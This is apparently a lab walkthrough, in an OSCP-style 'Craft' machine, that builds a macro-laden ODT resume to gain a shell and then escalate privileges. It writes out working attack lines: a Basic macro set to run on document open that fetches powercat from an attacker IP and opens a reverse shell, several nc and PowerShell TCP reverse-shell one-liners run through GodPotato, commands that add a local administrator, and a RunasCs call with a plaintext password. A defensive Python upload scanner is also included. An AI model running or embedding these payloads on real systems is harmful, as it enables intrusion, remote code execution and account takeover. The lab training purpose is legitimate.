Craft - MS Word upload - PrintSpoofer - VBA macro

Enum

nmap

ODT file

Next we are going to create a fake resume. Open a new document.

That should be enough, right? For our purposes a blank document might be best. Either way, save it. Go to Tools → Macros → Organize Macros → Basic.

Select your document, then New, and give it a name.

This will open a workspace. We will embed the following command in our macro. It simply calls back to our machine; it's a test.

Shell("cmd /c powershell iwr http://192.168.45.154/")

Be sure to save your macro and then your document. Then go back to the document (Dork-resume), select Tools and Customize.

Select Open Document then Assign Macro…

Select the Macro (Evil) that we created for our document and OK.

Note that the macro is now assigned to the action.

Close it by selecting OK again and save the document (Dork-resume).
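From the receiving side, the document built in the steps above is an upload that carries a Basic macro bound to the "Open Document" event. The following is an added example, not code from the original page: an upload-side check that opens an ODT package, lists embedded macro modules, reads the document-event bindings out of content.xml, and returns a verdict a web upload handler can act on. The package layout (Basic/... modules, office:event-listeners in content.xml) follows the ODF package format; the exact event name (dom:load) and the vnd.sun.star.script href form are assumptions based on what LibreOffice writes, and both sample documents are constructed in memory, with a placeholder string in place of any command.

```python
"""Gate uploaded ODT files: flag documents whose embedded Basic macro is bound
to a document event such as "Open Document".

Added example, not code from the original page. Sample packages are built in
memory; the macro body is a placeholder, not a payload.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "office": "urn:oasis:names:tc:opendocument:xmlns:office:1.0",
    "script": "urn:oasis:names:tc:opendocument:xmlns:script:1.0",
    "xlink": "http://www.w3.org/1999/xlink",
}
ODT_MIME = "application/vnd.oasis.opendocument.text"

# Any XML under Basic/ or Scripts/ is embedded code (StarBasic, Python, ...).
MACRO_DIR_RE = re.compile(r"^(Basic|Scripts)/.+\.xml$", re.I)
# Calls that spawn processes or reach outside the document; reported even
# when no auto-run binding is present.
CALL_RE = re.compile(r"\b(Shell|CreateObject|GetObject)\s*\(", re.I)

CONTENT_TMPL = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    f'<office:document-content xmlns:office="{NS["office"]}" '
    f'xmlns:script="{NS["script"]}" xmlns:xlink="{NS["xlink"]}">'
    "{scripts}<office:body/></office:document-content>"
)
# Constructed (assumed LibreOffice form): the binding written when a macro in
# the document-local library is assigned to "Open Document".
AUTORUN_SCRIPTS = (
    "<office:scripts><office:event-listeners>"
    '<script:event-listener script:language="ooo:script" script:event-name="dom:load" '
    'xlink:href="vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
    "</office:event-listeners></office:scripts>"
)
# Constructed macro module; the Shell argument is a placeholder.
MODULE_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<script:module xmlns:script="http://openoffice.org/2000/script" '
    'script:name="Module1" script:language="StarBasic">'
    "Sub Main\n Shell(&quot;PLACEHOLDER-COMMAND&quot;)\nEnd Sub</script:module>"
)


def build_odt(with_macro: bool) -> bytes:
    """Construct a minimal ODT package in memory (sample input for the check)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        # ODF requires 'mimetype' to be the first entry and stored uncompressed.
        z.writestr(zipfile.ZipInfo("mimetype"), ODT_MIME, compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", CONTENT_TMPL.format(scripts=AUTORUN_SCRIPTS if with_macro else ""))
        if with_macro:
            z.writestr("Basic/script-lc.xml", '<library:libraries xmlns:library="http://openoffice.org/2000/library"/>')
            z.writestr("Basic/Standard/script-lb.xml", '<library:library xmlns:library="http://openoffice.org/2000/library"/>')
            z.writestr("Basic/Standard/Module1.xml", MODULE_XML)
    return buf.getvalue()


def inspect_odt(data: bytes) -> dict:
    """Return macro files, document-event bindings, suspicious calls and a verdict."""
    report = {"mimetype": "", "macro_files": [], "event_listeners": [],
              "suspicious_calls": [], "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        if "mimetype" in names:
            report["mimetype"] = z.read("mimetype").decode("ascii", "replace")
        report["macro_files"] = [n for n in names if MACRO_DIR_RE.match(n)]
        for n in report["macro_files"]:
            body = z.read(n).decode("utf-8", "replace")
            calls = sorted({m.lower() for m in CALL_RE.findall(body)})
            report["suspicious_calls"] += [f"{n}:{c}" for c in calls]
        # Event bindings ("Open Document" and friends) live in content.xml under office:scripts.
        if "content.xml" in names:
            root = ET.fromstring(z.read("content.xml"))
            for el in root.iter(f"{{{NS['script']}}}event-listener"):
                report["event_listeners"].append(
                    (el.get(f"{{{NS['script']}}}event-name", ""), el.get(f"{{{NS['xlink']}}}href", "")))
    if report["event_listeners"] and report["macro_files"]:
        report["verdict"] = "block"    # embedded macro wired to a document event
    elif report["macro_files"] or report["event_listeners"]:
        report["verdict"] = "review"   # macro without auto-run, or a binding to an external script
    return report


if __name__ == "__main__":
    for label, doc in (("macro-with-autorun", build_odt(True)), ("plain", build_odt(False))):
        r = inspect_odt(doc)
        print(f"{label}: verdict={r['verdict']} macros={r['macro_files']} events={r['event_listeners']}")
```

The verdict deliberately distinguishes "macro present" (review) from "macro present and bound to a document event" (block), because a resume or cover letter has no legitimate reason to carry either; in practice a document-upload form can simply reject any ODT whose zip contains a Basic/ or Scripts/ directory, and the event-listener parse is what tells a responder whether the sample was built to fire on open.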

Now we set up a netcat listener on port 80. This will tell us if our macro works.

sudo nc -lvnp 80

Go back to the web page and upload the newly created resume.

Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell")

Go to the web upload directory, upload the shell to the website, then listen after running the shell.

.\SigmaPotato "net user dave4 lab /add"

.\SigmaPotato "net localgroup Administrators dave4 /add"

Upload GodPotato and netcat, then run netcat through GodPotato.

GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe <LHOST> <LPORT>"

Hint: check the .NET version.

reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s

GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.250 4445"

Stable:

GodPotato-NET4.exe -cmd "powershell -NoP -NonI -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.45.250',4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}\""

Hint: get the Windows version.

wmic os get osarchitecture

whoami is not working:

echo %USERNAME%
BILLYBOSS$

C:\Windows\System32\config\systemprofile>echo %USERDOMAIN%\%USERNAME%
WORKGROUP\BILLYBOSS$


.\RunasCs.exe administrator admin@123 cmd.exe -r 192.168.45.161:80